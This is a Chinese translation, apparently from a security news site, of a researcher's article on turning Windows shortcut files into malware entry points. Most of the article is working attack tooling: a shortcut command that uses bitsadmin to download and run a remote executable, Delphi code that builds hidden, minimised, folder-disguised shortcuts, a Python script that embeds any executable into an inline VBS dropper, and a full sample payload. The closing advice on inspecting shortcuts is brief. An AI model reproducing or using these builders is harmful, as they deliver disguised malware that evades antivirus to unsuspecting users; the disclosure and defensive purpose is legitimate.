安全路透社
当前位置:安全路透社 > 安全客 > 正文

【技术分享】将快捷方式打造成恶意软件入口(含演示视频)

http://p9.qhimg.com/t0173a8806f86fd2c97.jpg

翻译:shan66

预估

,或登陆

最近,安全研究人员发现了一种在Microsoft Windows操作系统中通过快捷方式安装恶意软件的方法。我们对于快捷方式再熟悉不过了,几乎每个人都在用,并且大家都没有戒心。正是由于这些特点,使得这些恶意软件很难发现,同时,清除起来就更困难了。


前言 


快捷方式并非二进制可执行文件,常用来指向其他地方的文件夹或文件。但是,它却可以执行Windows shell命令(这可能是一个非常危险的功能,通常用于编程任务,如系统的关闭/注销/直接通过常规快捷方式重新启动等)。

由于快捷方式不是二进制可执行文件,所以防病毒程序通常也不会检测快捷方式是否是恶意的。

快捷方式可以通过归档文件共享,而不会丢失其属性。

最后,你可以轻松地更改图标,所以恶意快捷方式很容易伪装成文件夹图标或图像。这可能有助于恶意软件通过社交媒体进行传播。


漏洞详述 


为了描述这种威胁,我们需要首先介绍一个本地的Windows程序,该程序名为BITSAdmin Tool,它可以嵌入到Windows XP SP2之后的所有Windows系统中。关于这个程序的详细介绍,请访问MSDN链接:

https://msdn.microsoft.com/en-us/library/windows/desktop/aa362813(v=vs.85).aspx

http://p2.qhimg.com/t0101f23eb4a33b2a98.png

简单来说,这个命令行工具主要用于创建下载任务并监视其进度。然而,使用这些命令行是非常危险的,因为Bitsadmin.exe带有微软签名,所以其他防病毒软件自然会对它放行,并且它能够以单独的命令行方式使用。

下面是BITSAdmin命令的一个例子: 

bitsadmin /transfer downloader /priority normal https://phrozensoft.com/uploads/2016/09/Winja_2_6084_65441_setup.exe %temp%\setup.exe

现在,让我们使用这个命令行工具来利用一个新的Windows快捷方式。


DIY,手动方式 


在资源管理器中(例如桌面上的空闲处)单击右键,然后单击“Create a new shortcut”菜单项。

http://p9.qhimg.com/t01036089ccec8804d6.png

然后,输入以下命令行: 

cmd.exe /C "%windir%\System32\bitsadmin.exe /transfer downloader /priority normal https://phrozensoft.com/uploads/2016/09/Winja_2_6084_65441_setup.exe %temp%\setup.exe & %temp%\setup.exe"

http://p4.qhimg.com/t01ecb1a72958f51e28.png

然后保存。

现在,在这个快捷方式上面单击右键,然后,选择属性。

http://p5.qhimg.com/t01474e57212e6a3dd9.png

将“Run”选项切换为“Run Minimized” 

http://p6.qhimg.com/t019d5f8db16abe8835.png

最后,将图标换为你最新喜欢的样子(例如文件夹图标) 

为了在共享快捷方式时保持图标不变,建议使用shell32.dll的图标(因为所有Windows系统中都有shell32.dll)。

注意:在Microsoft系统中,除了shell32.dll之外,Ieframe.dll、imageres.dll、pnidui.dll、wmploc.dll等文件的图标也非常有用。

http://p2.qhimg.com/t0178db470bd7296db5.png

http://p3.qhimg.com/t01727155b03e9dcfec.png

好了,恶意快捷方式现已准备就绪了。


DIY,编程方式(Delphi) 


uses ActiveX, ShlObj, ComObj;
function MaliciousLnk(fileUrl, destFile : String) : Boolean;
var cObject   : IUnknown;
    shellLink : IShellLink;
    PFile     : IPersistFile;
    LinkName  : string;
    Cmd       : String;
begin
  result := false;
  CoInitialize(nil);
  try
    cObject := CreateComObject(CLSID_ShellLink);
    shellLink := cObject as IShellLink;
    PFile := cObject as IPersistFile;
    Cmd := '/C "c:\windows\system32\bitsadmin.exe /transfer downloader /priority normal "' + fileURL + '" %temp%\tmp.exe & %temp%\tmp.exe"';
    shellLink.SetDescription('www.phrozensoft.com');
    shellLink.SetPath('cmd.exe');
    shellLink.SetArguments(PWideChar(cmd));
    shellLink.SetShowCmd(SW_SHOWMINNOACTIVE);
    shellLink.SetWorkingDirectory('%windir%\system32\');
    shellLink.SetIconLocation('shell32.dll', 1);
    result := PFile.Save(PWideChar(destFile), false) = S_OK;
  finally
    CoUninitialize();
  end;
end;

注意,这种技术在Windows XP SP2到Windows 10(最新版本)的所有版本上面都有效,其中包括相应的服务器版本。

通过这种方法,黑客甚至不需要创建下载恶意软件的代码,从而可以逃避防病毒检测。这里没有用到任何二进制可执行文件!

这里的bitsadmin.exe只是用来说明Windows快捷方式用法的一个例子,可以这么说,凡是可以通过命令行方式做到的事情,都可以通过快捷方式做到,例如:

使用所有常规的Windows DOS命令

使用PowerShell来制作恶意代码

使用新版Windows 10的嵌入式Linux系统(仅限于已激活此选项的用户)

使用rundll32.exe调用DLL导出的函数

等等… 

注意:对于不需要使用PowerShell的普通Windows用户(默认情况下已启用)来说,我们建议卸载该软件包。这样可以免受所有通过PowerShell安装恶意代码的恶意软件的攻击。

请按照以下步骤卸载PowerShell包(可以随时还原)

打开Program and Features,然后点选Turn Windows features on or off

http://p3.qhimg.com/t01d6c865267b6d0cde.png

向下滚动到PowerShell列表项,然后取消选中该复选框

http://p8.qhimg.com/t013151c549e378bee6.png

重新启动后,PowerShell包就会从您的系统中卸载。


利用Windows快捷方式的新方法


就在昨天,我们报告了一种通过快捷方式来感染Microsoft Windows用户的方法,该方法可以使用BITSAdmin工具来下载和执行远程应用程序。

我们的第一个示例的主要问题在于,防火墙可能会拦截下载尝试,而要想执行远程文件,则必须首先通过远程http/https连接进行下载。

现在,安全研究人员又发现了另一种利用Windows快捷方式的新方法:将任意文件(如应用程序文件)直接嵌入到快捷方式本身内部。


没错! 该应用程序就藏在Windows的快捷方式本身内部。


这使得恶意应用程序在执行之前,无论任何防病毒软件,根本就检测不到它。

注意:在下面介绍的PoC中,我们将使用这个漏洞作为文件dropper,与此同时,我们也可以采用另一种方式:将二进制文件直接注入内存,而不写入磁盘,这样的话,当这个恶意软件运行时,防病毒软件就更加难以检测到它了。关于后面这种方法,我们将单独写一篇文章进行详细介绍。

它是如何工作的? 


首先要做的是:创建一个恶意的VBS(Visual Basic脚本),它用于:

将应用程序文件转换为字节数组(通过python脚本完成)

然后创建一个临时的.exe文件

将字节数组写入此临时文件中

执行这个临时的.exe文件。

准备好VBS脚本后(仍然使用我们的python脚本示例),我们将该VBS代码转换为等价的一个单命令行,以便插入到新的快捷方式中。

通常来说,Windows快捷方式命令的最大长度在260个字符左右,但是,对于利用之前Delphi技巧所新建的快捷方式来说,你可以插入任意数量的字符,都不会对快捷方式造成不良影响。


创建内联恶意VBS应用程序提取器的脚本(Python 3.5) 


# SHORTCUT EXPLOIT           : FILE BINDER (WRAPPER)
# DISCOVERED AND CODED BY    : @DarkCoderSc
# https://twitter.com/DarkCoderSc
# Lead Developer / Security Researcher at Phrozen SAS (https://phrozensoft.com)
# jplesueur@phrozensoft.com
############################################
# This little script will generate a malicious shortcut. A file will be embedded
# Inside, when executed it will be extracted and executed.
import sys
import os
if len(sys.argv) != 3:
        print("Missing arguments!\n")
        print("Usage:\n")
        print(r"1) The executable file to be dropped (Needs to Exists)")
        print(r"2) The destination malicious shell payload file")
        exit()
FEXEFile  = str(sys.argv[1])
FFileDest = str(sys.argv[2])
if not os.path.exists(FEXEFile):
        print("The input executable file must exists!")
        exit()
#
# TRANSFORM INPUT FILE IN BINARY ARRAY
#
payload = "payload=array(";
with open(FEXEFile, 'rb') as FFile:
    while True:
        s = FFile.read(1)
        if len(s) == 0: break
        b = ord(s)
        payload += str(b) + ","
    payload = payload[:-1]
    payload += ")"
    FFile.close
#
# WRITE VBS EXTRACTION AND EXECUTION CODE TO BE PLACED IN A SHELL
#
tempFile      = " >> %temp%\\tmp.vbs"
maliciousVBS =  "del %temp%\\tmp.vbs & "
maliciousVBS += "echo "  + payload + tempFile                                                                                       + " & "
maliciousVBS += "echo "  + "Set FSO = Wscript.CreateObject(\"Scripting.FileSystemObject\")"                                         + tempFile + " & "
maliciousVBS += "echo "  + "Set CTF = FSO.CreateTextFile(\"%temp%\\tmp.exe\")"                                                      + tempFile + " & "
maliciousVBS += "echo "  + "for i = 0 to UBound(payload)"                                                                           + tempFile + " & "
maliciousVBS += "echo "  + "buff = buff^&chr(payload(i))"                                                                           + tempFile + " & "
maliciousVBS += "echo "  + "next"                                                                                                   + tempFile + " & "
maliciousVBS += "echo "  + "CTF.Write buff"                                                                                         + tempFile + " & "
maliciousVBS += "echo "  + "Dim objShell"                                                                                           + tempFile + " & "
maliciousVBS += "echo "  + "Set objShell = WScript.CreateObject(\"WScript.Shell\")"                                                 + tempFile + " & "
maliciousVBS += "echo "  + "CTF.Close"                                                                                              + tempFile + " & "
maliciousVBS += "echo "  + "objShell.Run(\"%temp%\\tmp.exe\")"                                                                      + tempFile + " & "
maliciousVBS += "%temp%\\tmp.vbs"
with open(FFileDest, 'w') as FDest:
    FDest.write(maliciousVBS)


将内联恶意VBS应用程序提取器注入到快捷方式的脚本(Delphi) 


(*
 SHORTCUT EXPLOIT           : FILE BINDER (WRAPPER)
 DISCOVERED AND CODED BY    : @DarkCoderSc
 https://twitter.com/DarkCoderSc
 Lead Developer / Security Researcher at Phrozen SAS (https://phrozensoft.com)
 jplesueur@phrozensoft.com
*)
program Shortcut_gen;
{$APPTYPE CONSOLE}
uses
  System.SysUtils, ActiveX, ShlObj, ComObj, Windows, Classes;
function MaliciousLnk(cmd, destPath : String) : Boolean;
var cObject   : IUnknown;
    shellLink : IShellLink;
    PFile     : IPersistFile;
begin
  result := false;
  CoInitialize(nil);
  try
    cObject := CreateComObject(CLSID_ShellLink);
    shellLink := cObject as IShellLink;
    PFile := cObject as IPersistFile;
    cmd := '/C "' + cmd + '"';
    shellLink.SetDescription('@DarkCoderSc');
    shellLink.SetPath('cmd.exe');
    shellLink.SetArguments(PWideChar(cmd));
    shellLink.SetShowCmd(SW_SHOWMINNOACTIVE);
    shellLink.SetWorkingDirectory('%windir%\system32\');
    shellLink.SetIconLocation('shell32.dll', 1);
    result := PFile.Save(PWideChar(destPath), false) = S_OK;
  finally
    CoUninitialize();
  end;
end;
var Arg1, Arg2 : String;
    strList    : TStringList;
begin
  try
    if ParamCount <> 2 then begin
      writeln('usage:');
      writeln('- Arg1 : Payload file, generated with the "gen_shortcut_code.py"');
      writeln('- Arg2 : Full path of destination shortcut');
      exit;
    end;
    Arg1 := ParamStr(1);
    Arg2 := ParamStr(2);
    if NOT FileExists(Arg1) then exit;
    // THIS IS JUST A LAZY WORKING EXAMPLE OF OPENNING TEXT FILES
    strList := TStringList.Create;
    strList.LoadFromFile(Arg1);
    MaliciousLnk(strList.Text, Arg2);
    strList.Free;
  finally
    writeln(#13#10 + 'Press enter to leave...');
    readln;
  end;
end.

生成的payload示例(利用x86汇编语言编写的Hello World示例) 

del %temp%\tmp.vbs & echo payload=array(77,90,128,0,1,0,0,0,4,0,16,0,255,255,0,0,64,1,0,0,0,0,0,0,64,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,128,0,0,0,14,31,186,14,0,180,9,205,33,184,1,76,205,33,84,104,105,115,32,112,114,111,103,114,97,109,32,99,97,110,110,111,116,32,98,101,32,114,117,110,32,105,110,32,68,79,83,32,109,111,100,101,46,13,10,36,0,0,0,0,0,0,0,0,80,69,0,0,76,1,2,0,133,214,90,88,0,0,0,0,0,0,0,0,224,0,15,1,11,1,1,71,0,2,0,0,0,2,0,0,0,0,0,0,0,16,0,0,0,16,0,0,0,32,0,0,0,0,64,0,0,16,0,0,0,2,0,0,1,0,0,0,0,0,0,0,4,0,0,0,0,0,0,0,0,48,0,0,0,2,0,0,9,63,0,0,2,0,0,0,0,16,0,0,0,16,0,0,0,0,1,0,0,0,0,0,0,0,0,0,16,0,0,0,0,0,0,0,0,0,0,0,0,32,0,0,176,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,46,116,101,120,116,0,0,0,42,0,0,0,0,16,0,0,0,2,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,32,0,0,96,46,105,100,97,116,97,0,0,176,0,0,0,0,32,0,0,0,2,0,0,0,4,0,0,0,0,0,0,0,0,0,0,0,0,0,0,64,0,0,192,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,106,0,255,21,104,32,64,0,80,232,12,0,0,0,72,101,108,108,111,32,87,111,114,108,100,0,106,0,255,21,152,32,64,0,106,0,255,21,100,32,64,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,88,32,0,0,0,0,0,0,0,0,0,0,60,32,0,0,100,32,0,0,144,32,0,0,0,0,0,0,0,0,0,0,74,32,0,0,152,32,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,75,69,82,78,69,76,51,50,46,68,76,76,0,0,85,83,69,82,51,50,46,68,76,76,0,0,0,0,112,32,0,0,126,32,0,0,0,0,0,0,112,32,0,0,126,32,0,0,0,0,0,0,0,0,69,120,105,116,80,114,111,99,101,115,115,0,0,0,71,101,116,67,111,109,109,97,110,100,76,105,110,101,65,0,160,32,0,0,0,0,0,0,160,32,0,0,0,0,0,0,0,0,77,101,115,115,97,103,101,66,111,120,65,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0) >> %temp%\tmp.vbs & echo Set FSO = Wscript.CreateObject("Scripting.FileSystemObject") >> %temp%\tmp.vbs & echo Set CTF = FSO.CreateTextFile("%temp%\tmp.exe") >> %temp%\tmp.vbs & echo for i = 0 to UBound(payload) >> %temp%\tmp.vbs & echo buff = buff^&chr(payload(i)) >> %temp%\tmp.vbs & echo next >> %temp%\tmp.vbs & echo CTF.Write buff >> %temp%\tmp.vbs & echo Dim objShell >> %temp%\tmp.vbs & echo Set objShell = WScript.CreateObject("WScript.Shell") >> %temp%\tmp.vbs & echo CTF.Close >> %temp%\tmp.vbs & echo objShell.Run("%temp%\tmp.exe") >> %temp%\tmp.vbs & %temp%\tmp.vbs

如果将它粘贴到您喜欢的命令提示符下,它会将一个VBS文件提取到临时文件夹中,如果运行此VBS文件的话,它将执行该嵌入式应用程序。

当你将这个payload注入一个快捷方式后,只需点击该快捷方式,它就会替你完成所有的工作!


使用方法


生成内联恶意VBS应用程序提取器 

py gen_inlinecode.py @APPLICATION_LOCATION @PAYLOAD_DESTINATION

然后生成快捷方式 

shortcut_gen.exe @PAYLOAD_LOCATION @SHORTCUT_DESTINATION

现在,将生成一个新的快捷方式,其中包含一个完整的应用程序。当双击该快捷方式时,它将提取出嵌入其中的应用程序,然后从临时文件夹执行该程序。

注意,如果打开快捷方式属性,则整个代码就不可用了,因为Microsoft通常只允许在参数字段中添加260个字节。这使得快捷方式更难以引起人们的警觉。

我们还可以修改脚本,使其在漏洞利用代码之前生成一个普通的垃圾“代码”,那么普通用户就会认为它是一个正常/安全的快捷方式。


PoC视频


快捷方式的最大尺寸约为64 KiB,这使得此漏洞可以兼容许多已知/未知病毒。


结束语


不要盲目相信你遇到的快捷方式。它们可能是用来隐藏恶意代码的,并且这些恶意软件通常是防病毒软件无法检测到的。如果随意打开的话,很可能就会中招!

您可以花些时间打开未知快捷方式的属性,看看它都是执行哪些命令。

如果您有任何疑问,请删除它! 


原文链接:https://www.phrozensoft.com/2016/12/shortcuts-as-entry-points-for-malware-18

未经允许不得转载:安全路透社 » 【技术分享】将快捷方式打造成恶意软件入口(含演示视频)

赞 (0)
分享到:更多 ()

评论 0

评论前必须登录!

登陆 注册